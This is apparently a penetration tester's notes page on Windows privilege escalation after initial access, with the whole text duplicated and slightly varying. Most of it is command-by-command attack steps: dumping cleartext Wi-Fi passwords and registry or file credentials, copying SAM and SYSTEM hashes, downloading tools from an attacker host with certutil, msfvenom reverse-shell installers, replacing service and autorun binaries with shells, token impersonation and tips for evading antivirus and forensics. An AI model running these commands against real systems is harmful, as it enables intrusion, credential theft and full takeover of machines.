Windows Privilege Escalation

🔥 This Steps after gain access :

MANUAL Enumeration :

🔥 1- System Enumeration : ( cmd )

Systeminfo ⇒ get all information about system
systeminfo | findstr /C:”OS Name” /C:”OS Version” /C:“System Type”
wmic qfe ⇒ ( Windows Management Instrumentation Command quick Fix Engineering ) ⇒ display a detailed list of all updates installed on this Windows system

🔥 2- User Enumeration

whoami ⇒ get the current user in machine
whoami /priv ⇒ get privilege of current user
whoami /group ⇒ get groups that user in
net user ⇒ get all users in machine
net user noby ⇒ get all information about noby in system
net localgroup administrator ⇒ get information about admin group**

🔥 3- Network Enumeration

ipconfig /all ⇒ get all information about machine in network**
arp -a ⇒ get arp table that contain ip addresses and mac address ⇒ arp ⇒ protocol resolve ip to mac
netstat -ano ⇒ to get all ports in this machine ⇒ we can use this for port forward & some times we can see ports doesn’t see in scan because it listen for internal service
netsh wlan show profile ⇒ get network wifi in this machine
netsh wlan show profile Elnoby key=clear ⇒ get password of ( Elnoby ) wifi in clear text

🔥 Firewall & AV Configuration :

sc query ⇒ get all services in machine then we know name of service
sc query windefend ⇒ Enumerate Firewall in machine (Running / stop ) ,, sc ⇒ service Control
netsh firewall show state ⇒ get state of firewall
netsh firewall show config ⇒ get all information about Firewall

🔥 Automate :

winpeas ⇒ get all information about target but need .net version be 4.0 or great
windows exploit suggester ⇒ run against database to look for any exploit get priv
- steps :
- get systeminfo and saved it in .txt file
- ./windows-exploit-suggester.py --update ⇒ update DB of exploits**
- ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt

Privilege Escalation and most techniques

🔥 1- Kernel Exploits Techniques : after get access

😎 Manual :

1.create my payload and send to target or upload in ftp server and execute it from website or ,,,,
2.use windows exploit suggester ⇒ run against database to look for any exploit get priv
- steps :
  - get systeminfo and saved it in .txt file
  - python2.7 windows-exploit-suggester.py --update ⇒ update DB of exploits
  - **./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt
3.search for result in exploit DB

Auto

1.Metasploit Module : run /post/multi/recon/loacl_exploit_suggester
- use background command to get back Metasploit
- then use the recommend exploit with use exploit_name and put our option

🔥 2- Password Hunting :

🤩findstr /si password *.txt *.ini *.config ⇒ get all files that contain password in system
.config ⇒ get password in configuration files such as sql and so on

😃look for password in registry :
reg query HKLM /f password /t REG_SZ /s #Look or registries that contains "password"
reg query HKCU /f password /t REG_SZ /s #Look for registries that contains "password"

Steps for Privilege :

1.copy SAM and SYSTEM files to kali
2.use creddump t

🔥 3- Port Forwarding From windows to kali :

1.Upload Plink.exe From kali to windows with cmd
- **certutil -urlcache -f [http://myip:port/plink64.exe](http://10.0.0.249:8000/plink64.exe) plink64.exe**
2.open my ssh in kali :
- **Service ssh start**
3.Run plink.exe From cmd :

plink.exe -l root -pw 2162016 -R:PORT_we_need_IN_WINDOWS:127.0.0.1:Recived_Port_in_kali my_kali_ip

🔥 4- Token Impersonation and Potato Attacks ⇒ resource link in comment

Tokens : Temporary key allow you to access Network/system Without input credential every time in login to access File ,,, Like a cookie ,, and have 2 types
- Delegated Tokens: Created for login into machine or using RDP
- ImpersonateTokens: non-interactive such as attaching network driver or domain logon script
Steps :
whoami /priv
- one of The most dangerous Privilege is
- SeAssignPrimaryToken ⇒ allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe
- SEImpersonatePrivilege : It can act as any other user, such as, Administrator. The vulnerability could be exploited with JuicyPotato**
- SeAssignPrimaryPrivilege : Assign an access token to new process. Can be exploited with JuicyPotato
- SeBackUpPrivilege : If a user has privilege to read files. That’s mean the user can extract password/hash from registry which could be used for pass-the-hash attack
- SeRestorePrivilege : This privilege grant a user to modify service binary, dll, also modify registry settings
Exploitation
- after get access to target we can use this command in meterpreter
- Load the script with use incognito
- List available token with command : list_tokens -u
- use ImpersonateTokens with username : impersonate_token "Admin"

🔥 5- get system techniques ( meterpreter )

1.pipe Impersonation in (memory/admin) : here we trying to impersonate the current user to become system
1. 1.creates a named pipe from Meterpreter create service cmd.exe
2. 2.When the spawned cmd.exe it connects to Meterpreter’s named pipe
3. 3.then meterpreter try to impersonate the Security context to run it as system
2.Pipe impersonate ( Dropper/Admin) : it look like technique 1 this technique drops a DLL to disk(!) and schedules rundll32.exe as a service to run the DLL as SYSTEM.
1. 1.it work with creates a named pipe and impersonates the security context of the first client to connect to it
2. 2.after pipe drops a DLL to disk(!) and schedules rundll32.exe as a service to run the DLL as SYSTEM
😜NOTE THAT this technique drops a file to disk. it lead to catch by AV ,,, If you need to avoid anti-virus or leave forensic evidence, Don’t use getsystem –t 0 and avoid getsystem –t 2.

3.Token Duplicate in ( Memory/Admin) : This technique depend on you have SeDebugPrivileges ( whoami /priv)
1. 1.It loops through all open services to find one running as SYSTEM and then give permissions to inject into
2. 2.It uses reflective DLL injection to run its elevator.dll in memory space of the service it finds. it passes thread id from Meterpreter to elevator.dll
3. 3.when it run elevator.dll gets the SYSTEM token, opens the primary thread in Meterpreter, and try to apply the SYSTEM token

😛 This technique limits itself to x86 environments only. and it takes place in memory

🔥 6- RUNAS :

allow us to run command as another user may be admin
After get Shell we must make this steps To make Privilege Escalation
1.cmdkey /list
2.run this command to run cmd as admin :
C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C\Windows\System23\cmd.exe”

💡7- Registry :

1.AutoRuns : Windows can be configured to run commands at startup, with elevated privileges
- AutoRuns are configured in the Registry
- If you are able to write to an AutoRun executable, and are able to restart the system you may be able to escalate privilegesSteps for Check it :
- run this in cmd : reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run it checks for auto run programs
- use access_check.exe for every path we see to show if we can write in it or no .\accesschk.exe /accepteula -wvu “PATH”
- if we can write in the path we replace the exe with our shell
- move the original exe to Temp
- copy /Y “PATH of SHEll” "C:\Program Files\Autorun Program\program.exe”
😃 Note exploit here work depend on last login user

2.AlwaysInstallElevated : it’s a policy to install a Windows Installer package with elevated (system) privileges.

Steps For it Manually:

1.check for this 2 registry & if value =1 here we will success to get privilege

**reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedreg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated**2. Create a new reverse shell with msfvenom using the msi format, and save it with the .msi extension

msfvenom -p windows/x64/shell_reverse_tcpLHOST=192.168.1.11 LPORT=53 -f msi -o reverse.msi

3. Copy the reverse.msi across to the Windows & make new listener & run .msi filemsiexec /quiet /qn /i C:\PrivEsc\reverse.msi😐 **Note :** The MSIEXEC windows command-line tool is a Microsoft Windows installer use to execute action in windows install

we can do it Auto with : exploit/windows/local/always_install_elevated

💡 8- Startup Application :

it’s a program that run when windows startup

Steps :

1.icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
2.From the output we know that which program run in startup
3.create a new shell and replace it with startup application
4.make listener in msfconsole
5.restart system and take shell

💡9- Services :

1.Binary Paths / Insecure Service Permissions : technique here we try to show what service Permission can we modify it and restart service to add user into admin group

Steps : Auto

1.use module ---- > exploit/windows/service_permission

Steps : manual

1.Enumerate with winpeas - powerup - sc query
2.check what service we can modify : accesschk.exe -uvwc Everyone *
3.run access check against service to check our permission : accesschk.exe -uvwc <service>
4.show configuration of service : sc qc <service>
5.Change configuration of service : sc config <service> binpath=”net localgroup administrators noby /add”
6.check the change in group : net localgroup administrators ⇒ success

2.Unquoted Service Path : its a service that have space between name and don’t close with “”

Steps : Auto

use module : **use exploit/windows/local/unquoted_service_path**

Steps : Manual

1.Enumerate with winpeas - powerup - sc query
2.choose service run with system privilege and query it to show it’s configuration : sc qc <service>
3.make another payload and put it step back : put it with common files and name it common.exe
4.make listener in msfconsole and run service : net start <service>
5.in meterpreter getuid

3.Insecure Service Executables : attack here depend on replace service executable work with system with our payload

Steps : Auto
use module ---- > exploit/windows/local/service_permissions

Steps: Manual

1.Enumerate with winpeas - powerup
2.try to get service executable modify by every one
3.use access check to show if it writable by every one : **.\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe”**
4.Create a backup of the original service executable in temp directory :
5.copy our payload in the place of service executable
6.start listener in kali and start service : net start file_service

4.Weak Registry Permissions : registry stores entries for each service , if it have ACL misconfiguration we will modify service configuration

Steps :

1.Enumerate with winpeas - powerup
2.use access check to check if it able to modify : .\accesschk.exe /accepteula -uvwq HKLM\System\CurrentControlSet\Services\regsvc
3.then we get the location of that registry : reg query HKLM\SYSTEM\CurrentControlSet\services\regsvc
4.over write that register to add our reverse shell : reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d <new_shell_path> /f
5.start listener && service : net start regsvc

Some Useful Links

Automated Tools

PreviousLinux Privilege Escalation NextHTB Writeups

Last updated 1 year ago

Windows Privilege Escalation

🔥 This Steps after gain access :

MANUAL Enumeration :

🔥 1- System Enumeration : ( cmd )

Systeminfo ⇒ get all information about system
systeminfo | findstr /C:”OS Name” /C:”OS Version” /C:“System Type”
wmic qfe ⇒ ( Windows Management Instrumentation Command quick Fix Engineering ) ⇒ display a detailed list of all updates installed on this Windows system

🔥 2- User Enumeration

whoami ⇒ get the current user in machine
whoami /priv ⇒ get privilege of current user
whoami /group ⇒ get groups that user in
net user ⇒ get all users in machine
net user noby ⇒ get all information about noby in system
net localgroup administrator ⇒ get information about admin group**

🔥 3- Network Enumeration

ipconfig /all ⇒ get all information about machine in network**
arp -a ⇒ get arp table that contain ip addresses and mac address ⇒ arp ⇒ protocol resolve ip to mac
netstat -ano ⇒ to get all ports in this machine ⇒ we can use this for port forward & some times we can see ports doesn’t see in scan because it listen for internal service
netsh wlan show profile ⇒ get network wifi in this machine
netsh wlan show profile Elnoby key=clear ⇒ get password of ( Elnoby ) wifi in clear text

🔥 Firewall & AV Configuration :

sc query ⇒ get all services in machine then we know name of service
sc query windefend ⇒ Enumerate Firewall in machine (Running / stop ) ,, sc ⇒ service Control
netsh firewall show state ⇒ get state of firewall
netsh firewall show config ⇒ get all information about Firewall

🔥 Automate :

winpeas ⇒ get all information about target but need .net version be 4.0 or great
windows exploit suggester ⇒ run against database to look for any exploit get priv
- steps :
- get systeminfo and saved it in .txt file
- ./windows-exploit-suggester.py --update ⇒ update DB of exploits**
- ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt

Privilege Escalation and most techniques

🔥 1- Kernel Exploits Techniques : after get access

😎 Manual :

1.create my payload and send to target or upload in ftp server and execute it from website or ,,,,
2.use windows exploit suggester ⇒ run against database to look for any exploit get priv
- steps :
  - get systeminfo and saved it in .txt file
  - python2.7 windows-exploit-suggester.py --update ⇒ update DB of exploits
  - **./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt
3.search for result in exploit DB

Auto

1.Metasploit Module : run /post/multi/recon/loacl_exploit_suggester
- use background command to get back Metasploit
- then use the recommend exploit with use exploit_name and put our option

🔥 2- Password Hunting :

🤩findstr /si password *.txt *.ini *.config ⇒ get all files that contain password in system
.config ⇒ get password in configuration files such as sql and so on

😃look for password in registry :
reg query HKLM /f password /t REG_SZ /s #Look or registries that contains "password"
reg query HKCU /f password /t REG_SZ /s #Look for registries that contains "password"

Steps for Privilege :

1.copy SAM and SYSTEM files to kali
2.use creddump t

🔥 3- Port Forwarding From windows to kali :

1.Upload Plink.exe From kali to windows with cmd
- **certutil -urlcache -f [http://myip:port/plink64.exe](http://10.0.0.249:8000/plink64.exe) plink64.exe**
2.open my ssh in kali :
- **Service ssh start**
3.Run plink.exe From cmd :

plink.exe -l root -pw 2162016 -R:PORT_we_need_IN_WINDOWS:127.0.0.1:Recived_Port_in_kali my_kali_ip

🔥 4- Token Impersonation and Potato Attacks ⇒ resource link in comment

Tokens : Temporary key allow you to access Network/system Without input credential every time in login to access File ,,, Like a cookie ,, and have 2 types
- Delegated Tokens: Created for login into machine or using RDP
- ImpersonateTokens: non-interactive such as attaching network driver or domain logon script
Steps :
whoami /priv
- one of The most dangerous Privilege is
- SeAssignPrimaryToken ⇒ allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe
- SEImpersonatePrivilege : It can act as any other user, such as, Administrator. The vulnerability could be exploited with JuicyPotato**
- SeAssignPrimaryPrivilege : Assign an access token to new process. Can be exploited with JuicyPotato
- SeBackUpPrivilege : If a user has privilege to read files. That’s mean the user can extract password/hash from registry which could be used for pass-the-hash attack
- SeRestorePrivilege : This privilege grant a user to modify service binary, dll, also modify registry settings
Exploitation
- after get access to target we can use this command in meterpreter
- Load the script with use incognito
- List available token with command : list_tokens -u
- use ImpersonateTokens with username : impersonate_token "Admin"

🔥 5- get system techniques ( meterpreter )

1.pipe Impersonation in (memory/admin) : here we trying to impersonate the current user to become system
1. 1.creates a named pipe from Meterpreter create service cmd.exe
2. 2.When the spawned cmd.exe it connects to Meterpreter’s named pipe
3. 3.then meterpreter try to impersonate the Security context to run it as system
2.Pipe impersonate ( Dropper/Admin) : it look like technique 1 this technique drops a DLL to disk(!) and schedules rundll32.exe as a service to run the DLL as SYSTEM.
1. 1.it work with creates a named pipe and impersonates the security context of the first client to connect to it
2. 2.after pipe drops a DLL to disk(!) and schedules rundll32.exe as a service to run the DLL as SYSTEM
3. 3.DLL connects to the named pipe . Look at in Meterpreter’s source
😜NOTE THAT this technique drops a file to disk. it lead to catch by AV ,,, If you need to avoid anti-virus or leave forensic evidence, Don’t use getsystem –t 0 and avoid getsystem –t 2.

3.Token Duplicate in ( Memory/Admin) : This technique depend on you have SeDebugPrivileges ( whoami /priv)
1. 1.It loops through all open services to find one running as SYSTEM and then give permissions to inject into
2. 2.It uses reflective DLL injection to run its elevator.dll in memory space of the service it finds. it passes thread id from Meterpreter to elevator.dll
3. 3.when it run elevator.dll gets the SYSTEM token, opens the primary thread in Meterpreter, and try to apply the SYSTEM token

😛 This technique limits itself to x86 environments only. and it takes place in memory

🔥 6- RUNAS :

allow us to run command as another user may be admin
After get Shell we must make this steps To make Privilege Escalation

1.cmdkey /list
2.run this command to run cmd as admin :
C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C\Windows\System23\cmd.exe”

💡7- Registry :

1.AutoRuns : Windows can be configured to run commands at startup, with elevated privileges
- AutoRuns are configured in the Registry
- If you are able to write to an AutoRun executable, and are able to restart the system you may be able to escalate privilegesSteps for Check it :
- run this in cmd : reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run it checks for auto run programs
- use access_check.exe for every path we see to show if we can write in it or no .\accesschk.exe /accepteula -wvu “PATH”
- if we can write in the path we replace the exe with our shell
- move the original exe to Temp
- copy /Y “PATH of SHEll” "C:\Program Files\Autorun Program\program.exe”
😃 Note exploit here work depend on last login user

2.AlwaysInstallElevated : it’s a policy to install a Windows Installer package with elevated (system) privileges.

Steps For it Manually:

1.check for this 2 registry & if value =1 here we will success to get privilege

msfvenom -p windows/x64/shell_reverse_tcpLHOST=192.168.1.11 LPORT=53 -f msi -o reverse.msi

we can do it Auto with : exploit/windows/local/always_install_elevated

💡 8- Startup Application :

it’s a program that run when windows startup

Steps :

1.icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
2.From the output we know that which program run in startup
3.create a new shell and replace it with startup application
4.make listener in msfconsole
5.restart system and take shell

💡9- Services :

1.Binary Paths / Insecure Service Permissions : technique here we try to show what service Permission can we modify it and restart service to add user into admin group

Steps : Auto

1.use module ---- > exploit/windows/service_permission

Steps : manual

1.Enumerate with winpeas - powerup - sc query
2.check what service we can modify : accesschk.exe -uvwc Everyone *
3.run access check against service to check our permission : accesschk.exe -uvwc <service>
4.show configuration of service : sc qc <service>
5.Change configuration of service : sc config <service> binpath=”net localgroup administrators noby /add”
6.check the change in group : net localgroup administrators ⇒ success

2.Unquoted Service Path : its a service that have space between name and don’t close with “”

Steps : Auto

use module : **use exploit/windows/local/unquoted_service_path**

Steps : Manual

1.Enumerate with winpeas - powerup - sc query
2.choose service run with system privilege and query it to show it’s configuration : sc qc <service>
3.make another payload and put it step back : put it with common files and name it common.exe
4.make listener in msfconsole and run service : net start <service>
5.in meterpreter getuid

3.Insecure Service Executables : attack here depend on replace service executable work with system with our payload

Steps : Auto
use module ---- > exploit/windows/local/service_permissions

Steps: Manual

1.Enumerate with winpeas - powerup
2.try to get service executable modify by every one
3.use access check to show if it writable by every one : **.\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe”**
4.Create a backup of the original service executable in temp directory :
5.copy our payload in the place of service executable
6.start listener in kali and start service : net start file_service

4.Weak Registry Permissions : registry stores entries for each service , if it have ACL misconfiguration we will modify service configuration

Steps :

1.Enumerate with winpeas - powerup
2.use access check to check if it able to modify : .\accesschk.exe /accepteula -uvwq HKLM\System\CurrentControlSet\Services\regsvc
3.then we get the location of that registry : reg query HKLM\SYSTEM\CurrentControlSet\services\regsvc
4.over write that register to add our reverse shell : reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d <new_shell_path> /f
5.start listener && service : net start regsvc

Some Useful Links

BEST

Automated Tools

winpeas: Windows Priv Esc Checklist: Sherlock: Watson: PowerUp: JAWS: Windows Exploit Suggester: Metasploit Local Exploit Suggester: Seatbelt: SharpUp:

PreviousLinux Privilege Escalation NextHTB Writeups

Last updated 1 year ago